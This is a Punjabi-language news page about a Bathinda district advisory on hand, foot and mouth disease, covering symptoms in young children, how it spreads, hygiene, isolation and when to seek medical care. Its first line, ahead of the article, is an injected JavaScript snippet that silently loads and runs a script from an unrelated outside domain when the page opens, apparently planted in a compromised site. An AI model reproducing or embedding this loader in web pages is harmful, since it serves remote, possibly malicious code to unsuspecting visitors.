;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਵੱਲੋਂ ਹੱਥਾਂ, ਪੈਰਾਂ ਤੇ ਮੂੰਹ ਦੀ ਬਿਮਾਰੀ ਸਬੰਧੀ ਅਡਵਾਈਜ਼ਰੀ ਜਾਰੀ - Disha Darpan News Punjabi

ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਵੱਲੋਂ ਹੱਥਾਂ, ਪੈਰਾਂ ਤੇ ਮੂੰਹ ਦੀ ਬਿਮਾਰੀ ਸਬੰਧੀ ਅਡਵਾਈਜ਼ਰੀ ਜਾਰੀ

Share this post

ਬਠਿੰਡਾ, 7 ਅਗਸਤ (  RAMESHSINGH RAWAT  ) 

ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਸ੍ਰੀ ਸ਼ੌਕਤ ਅਹਿਮਦ ਪਰੇ ਵੱਲੋਂ ਜ਼ਿਲ੍ਹਾ ਵਾਸੀਆਂ ਲਈ ਹੱਥਾਂ, ਪੈਰਾਂ ਅਤੇ ਮੂੰਹ ਦੀ ਬਿਮਾਰੀ ਸਬੰਧੀ ਅਡਵਾਈਜ਼ਰੀ ਜਾਰੀ ਕੀਤੀ ਗਈ ਹੈ, ਤਾਂ ਜੋ ਇਸ ਬਿਮਾਰੀ ਤੋਂ ਬਚਾਅ ਹੋ ਸਕੇ। ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਵੱਲੋਂ ਜਾਰੀ ਕੀਤੀ ਗਈ ਅਡਵਾਈਜ਼ਰੀ ਅਨੁਸਾਰ ਇਹ ਵੱਖ-ਵੱਖ ਵਾਇਰਸਾਂ ਕਾਰਨ ਹੋਣ ਵਾਲੀ ਛੂਤ ਵਾਲੀ ਬਿਮਾਰੀ ਹੈ। ਛੋਟੇ ਬੱਚੇ ਜੋ 05 ਸਾਲ ਤੋਂ ਘੱਟ ਉਮਰ ਦੇ ਹੋਣ ਨੂੰ ਇਹ ਬਿਮਾਰੀ ਹੋਣ ਦੀ ਜ਼ਿਆਦਾ ਸੰਭਾਵਨਾ ਹੁੰਦੀ ਹੈ। ਇਸ ਬਿਮਾਰੀ ਦੇ ਲੱਛਣ ਜਿਵੇਂ ਭੁੱਖ ਘੱਟ ਲੱਗਣਾ, ਗਲੇ ਵਿੱਚ ਖਰਾਸ਼, ਬੇਚੈਨੀ, ਬੁਖਾਰ, ਮੂੰਹ/ਜੀਭ ਵਿੱਚ ਛਾਲੇ, ਹਥੇਲੀਆਂ ਅਤੇ ਤਲੀਆਂ ‘ਤੇ ਮੈਕੂਲੋਪੈਪੁਲਰ ਧੱਫੜ ਅਤੇ ਲੱਤਾਂ/ਗੋਡੇ/ਜਨਨ ਖੇਤਰ ਵਿੱਚ ਦਿਖਾਈ ਦੇ ਸਕਦੇ ਹਨ। ਜਾਰੀ ਅਡਵਾਈਜ਼ਰੀ ਅਨੁਸਾਰ ਇਹ ਬਿਮਾਰੀ ਲਾਰ, ਛਾਲਿਆਂ ਤੋਂ ਤਰਲ, ਲਾਗ ਵਾਲੇ ਵਿਅਕਤੀ ਦੇ ਮਲ ਦੇ ਪਦਾਰਥ ਰਾਹੀਂ ਸਿੱਧੇ ਸੰਪਰਕ ਦੁਆਰਾ ਇੱਕ ਵਿਅਕਤੀ ਤੋਂ ਦੂਜੇ ਵਿਅਕਤੀ ਵਿੱਚ ਫ਼ੈਲਦੀ ਹੈ। ਇਸ ਤੋਂ ਇਲਾਵਾ ਇਹ ਬਿਮਾਰੀ ਕਿਸੇ ਵੀ ਸੰਕਰਮਿਤ ਵਿਅਕਤੀ ਦੇ ਖੰਘਣ ਅਤੇ ਛਿੱਕਣ ਰਾਹੀਂ ਬੂੰਦਾਂ ਦੀ ਲਾਗ ਰਾਹੀਂ,  ਦੂਸ਼ਿਤ ਵਸਤੂਆਂ ਜਿਵੇਂ ਖਿਡੌਣੇ, ਕੱਪੜੇ ਅਤੇ ਦੂਸ਼ਿਤ ਸਤਹਾਂ ਰਾਹੀਂ ਵੀ ਫ਼ੈਲ ਸਕਦੀ ਹੈ।  ਇਸ ਬਿਮਾਰੀ ਤੋਂ ਬਚਾਅ ਲਈ ਹੱਥਾਂ ਨੂੰ ਸਾਬਣ ਅਤੇ ਪਾਣੀ ਨਾਲ ਵਾਰ-ਵਾਰ ਅਤੇ ਸਹੀ ਢੰਗ ਨਾਲ ਧੋਣਾ, ਖਾਸ ਕਰਕੇ ਬੱਚਿਆਂ ਦੇ ਡਾਇਪਰ ਬਦਲਣ ਅਤੇ ਟਾਇਲਟ ਦੀ ਵਰਤੋਂ ਕਰਨ ਤੋਂ ਬਾਅਦ ਹੱਥਾਂ ਨੂੰ ਚੰਗੀ ਤਰ੍ਹਾਂ ਸਾਫ਼ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ। ਇਸ ਤੋਂ ਇਲਾਵਾ ਜੇਕਰ ਬੱਚੇ ਵਿੱਚ ਲਾਗ ਦੇ ਲੱਛਣ ਦਿਖਾਈ ਦਿੰਦੇ ਹਨ, ਤਾਂ ਬੱਚੇ ਨੂੰ ਘਰ ਵਿੱਚ ਅਲੱਗ ਰੱਖੋ, ਭੀੜ ਵਾਲੀਆਂ ਜਨਤਕ ਥਾਵਾਂ, ਪਲੇ-ਗਰੁੱਪ, ਪਬਲਿਕ ਟ੍ਰਾਂਸਪੋਰਟ ਅਤੇ ਸਕੂਲ/ਕਿੰਡਰ ਗਾਰਡਨ ਤੋਂ ਦੂਰ ਰੱਖਿਆ ਜਾਵੇ। ਇਸੇ ਤਰ੍ਹਾਂ ਹੀ ਗੰਦੀਆਂ ਸਤਹਾਂ ਅਤੇ ਗੰਦੀਆਂ ਚੀਜ਼ਾਂ ਨੂੰ ਸਾਬਣ ਅਤੇ ਪਾਣੀ ਨਾਲ ਸਾਫ਼ ਕਰੋ ਅਤੇ ਫਿਰ ਰੋਗਾਣੂ ਮੁਕਤ ਕੀਤਾ ਜਾਵੇ, ਖੰਘਣ ਅਤੇ ਛਿੱਕਣ ਵੇਲੇ ਮੂੰਹ ਅਤੇ ਨੱਕ ਨੂੰ ਢਕ ਕੇ ਰੱਖਣਾ, ਐਚ.ਐਫ਼.ਐਮ.ਡੀ. ਨਾਲ ਸੰਕਰਮਿਤ ਵਿਅਕਤੀ ਨਾਲ ਨਜ਼ਦੀਕੀ ਸੰਪਰਕ (ਚੁੰਮਣਾ, ਜੱਫੀ ਪਾਉਣਾ, ਭਾਂਡੇ ਸਾਂਝੇ ਕਰਨ) ਤੋਂ ਬਚਣਾ ਜ਼ਰੂਰੀ ਹੈ। ਜਾਰੀ ਅਡਵਾਈਜ਼ਰੀ ਅਨੁਸਾਰ ਸਕੂਲੀ ਸੰਸਥਾਵਾਂ ਆਦਿ ਨੂੰ ਅਪੀਲ ਕੀਤੀ ਗਈ ਹੈ ਕਿ ਜੇਕਰ ਬੱਚੇ ਨੂੰ ਬੁਖਾਰ ਅਤੇ ਧੱਫੜ ਦਿਖਾਈ ਦਿੰਦੇ ਹਨ, ਤਾਂ ਉਹਨਾਂ ਦੇ ਮਾਪਿਆਂ ਨੂੰ ਤੁਰੰਤ ਸੂਚਿਤ ਕੀਤਾ ਜਾਵੇ। ਡਾਕਟਰੀ ਦੇਖਭਾਲ ਸੰਕਰਮਿਤ ਬੱਚੇ ਦੇ ਵਿਕਾਸ ਦੇ ਮਾਮਲੇ ਵਿੱਚ ਮਾਪੇ ਤੁਰੰਤ ਡਾਕਟਰਾਂ ਨਾਲ ਸਲਾਹ ਕਰਨ ।ਜਾਰੀ ਅਡਵਾਈਜ਼ਰੀ ਅਨੁਸਾਰ ਤੇਜ਼ ਬੁਖਾਰ, ਸੁਸਤ, ਘੱਟ ਪਿਸ਼ਾਬ, ਤੇਜ਼ ਸਾਹ ਲੈਣਾ ਉਲਟੀ ਆਉਣਾ ਸੁਸਤੀ/ਫਿਟਸ ਆਦਿ ਤੇ ਮਾਪੇ ਨੇੜਲੇ ਹਸਪਤਾਲ ਜਾਂ ਨੋਡਲ ਅਫ਼ਸਰ ਨਾਲ ਵੀ ਸੰਪਰਕ ਕਰਨ।

Leave a Reply

Your email address will not be published. Required fields are marked *

× How can I help you?